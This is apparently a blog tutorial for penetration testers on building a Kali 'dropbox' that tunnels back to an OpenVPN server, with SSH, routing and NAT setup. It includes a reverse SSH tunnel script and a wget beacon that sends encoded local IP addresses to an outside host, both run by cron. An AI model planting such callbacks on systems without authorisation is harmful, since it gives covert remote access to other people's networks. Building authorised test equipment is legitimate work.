Content


Introduction

This is part 3 in a series about managing dropboxes for internal penetration testing. This part is all about provisioning a dropbox to be used with our OpenVPN server that we setup in part 2. Follow this tutorial whenever you need to build a dropbox for a client.

Read part 1 and especially part 2 before continuing.

OS Configuration

Install Kali or your favorite distro. After installing Kali, I perform the following minimal changes:

Post Kali Changes


1. SSH Tweaks

Make sure the following options are set in /etc/ssh/sshd_config:

PermitRootLogin yes
PubkeyAuthentication yes
AuthorizedKeysFile  .ssh/authorized_keys .ssh/authorized_keys2

Start SSH and set it to come up on boot:

systemctl start ssh
systemctl enable ssh


2. System Updates

Update kali and basic tools:

apt update
apt -y upgrade
nmap --script-updatedb

echo "setup msf db"
msfdb init
msfconsole -x "db_rebuild_cache;exit"

echo "fix vim, sigh"
echo ':set mouse=v' > ~/.vimrc


3. [optional] Install Custom Scripts/Repos

I use a special user account on my gitlab server specifically for the cloning of custom repos and tools during the provisioning process. I do this so I can freely copy they keys via a script and it doesn't force you to use your personal, highly confidential, SSH keys. If someone steals these keys, its not a big deal, they'd have to have internal access to my network and even then, the repos are read-only.

I copy and paste this script into the terminal.

Setup Failover Scripts

I use two scripts to help with troubleshooting if the VPN cannot establish. The first is a backup reverse ssh connection. The second base64 encodes the current IP and sends it in the URI via wget. This allows me to see if the dropbox receives an IP and can talk outbound across some ports. This is helpful for when OpenVPN fails due to proxies.

Create a reverse SSH script called phonehome.sh in /root:

#!/bin/bash
createTunnel() {
    /usr/bin/ssh -o StrictHostKeyChecking=no -i /root/.ssh/callback -N -R 2222:localhost:22 callback@<PUB_IP_OF_OPENVPN_SRV>
    if [[ $? -eq 0 ]]; then
        echo Tunnel to jumpbox created successfully
    else
        echo "[!] error occurred creating a tunnel to jumpbox"
    fi
}
/bin/pidof ssh
if [[ $? -ne 0 ]]; then
    echo "[+] creating new tunnel connection"
    createTunnel
fi

Create a HTTP beaconing script called beacon.sh in /root:

#! /bin/sh
SERVER="<PUB_IP_OF_OPENVPN_SRV>"

IPINFO=`ifconfig | awk '/inet/{print $2}' | cut -d: -f2 |base64`

wget -T1 -q http://$SERVER/$IPINFO
wget -T1 -q https://$SERVER/$IPINFO
wget -T1 -q http://$SERVER:53/$IPINFO

Set both scripts to be executable:

chmod +x /root/{beacon,phonehome}.sh

Setup cron to execute them periodically. Mine looks like this:

*/5 * * * * root /root/beacon.sh 2>&1
*/1 * * * * root /root/phonehome.sh 2>&

Create separate SSH keys for the failover script phonehome.sh:

ssh-keygen -b 2048 -t rsa -f /root/.ssh/callback -q -N ""

On the OpenVPN server, create a user named 'callback'. Then copy the SSH pub key you generated from the previous step (/root/.ssh/callback.pub), to the authorizedkeys file on the openVPN server: `/home/callback/.ssh/authorizedkeys`. You might need to create the .ssh directory.

Setup OpenVPN


1. OpenVPN Server-Side Account Setup (Do this on your OpenVPN server)

Create the certificate for your dropbox:

cd /etc/openvpn/easy-rsa
source vars
./build-key $CLIENT01

Create a ccd file in /etc/openvpn/ccd directory and make sure it's filename matches the CN field of the cert you create ($CLIENT01). You'll use the iroute command to define client networks that should be routed through the dropbox. These are the target networks you're testing. Here is an example of what should be inside your file:

# client networks we want to route through the dropbox
iroute 10.65.0.0 255.255.0.0
iroute 10.66.0.0 255.255.0.0

Lastly, you need to tell OpenVPN what users (pentesters) you want to push these client routes to. This will allow you to reach the client far-end target networks via your own computer. Now you're cooking in your own kitchen! Here is an example of mine (again, the filename must match the CN name of the certs you use to connect to the VPN):

# $client01 networks to route through the pttunnel
push "route 10.65.0.0 255.255.0.0"
push "route 10.66.0.0. 255.255.0.0"


2. OpenVPN Client Configuration (Do this on your dropbox)

Copy certs from your OpenVPN server (I usually buffer copy and paste, but you can SCP them):

  1. Copy /etc/openvpn/easy-rsa/ca.crt from OpenVPN and save it to /etc/openvpn/ca.crt on your dropbox.
  2. Copy /etc/openvpn/easy-rsa/$CLIENT01.crt from OpenVPN and save it to /etc/openvpn/$CLIENT01.crt on your dropbox.
  3. Copy /etc/openvpn/easy-rsa/$CLIENT01.key from OpenVPN and save it to /etc/openvpn/$CLIENT01.key on your dropbox.

Create the OpenVPN client config in /etc/openvpn/pttunnel.conf:

client
dev tun
#tls-remote vpn01
proto tcp
remote <PUB_IP_OF_OPENVPN_SRV> 443
remote <PUB_IP_OF_OPENVPN_SRV> 8080
remote <PUB_IP_OF_OPENVPN_SRV> 53
dev tun
persist-key
persist-tun
verb 3
remote-cert-tls server
ca /etc/openvpn/ca.crt
cert /etc/openvpn/$CLIENT.crt
key /etc/openvpn/$CLIENT.key
cipher AES-256-CBC
comp-lzo


3. Testing the VPN

If you're on the same network as the OpenVPN server, you might have problems testing the VPN by its public IP because you'll need a NAT loopback or aka NAT hairpins. To make things easy, you can test by changing the remote directive in the config to be the internal IP and port of the OpenVPN server. I usually monitor logs or run openvpn in the foreground long enough to make sure the tunnel doesn't flap.


4. Set OpenVPN to start on boot

systemctl enable openvpn


5. Setup NAT

You'll want your traffic to look like its sourced from the dropbox itself. To do this, use the following iptables command substituting :

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -d <TARGET_NETWORK> -o eth0 -j MASQUERADE 


Troubleshooting

If Kali 2018.2 goes to sleep on you after disabling the screen lock and sleep functions via UI, the following will help disable all suspend, sleep, and hibernation:

systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target


Resources and Tips

Happy Hacking!!!

- @caseycammilleri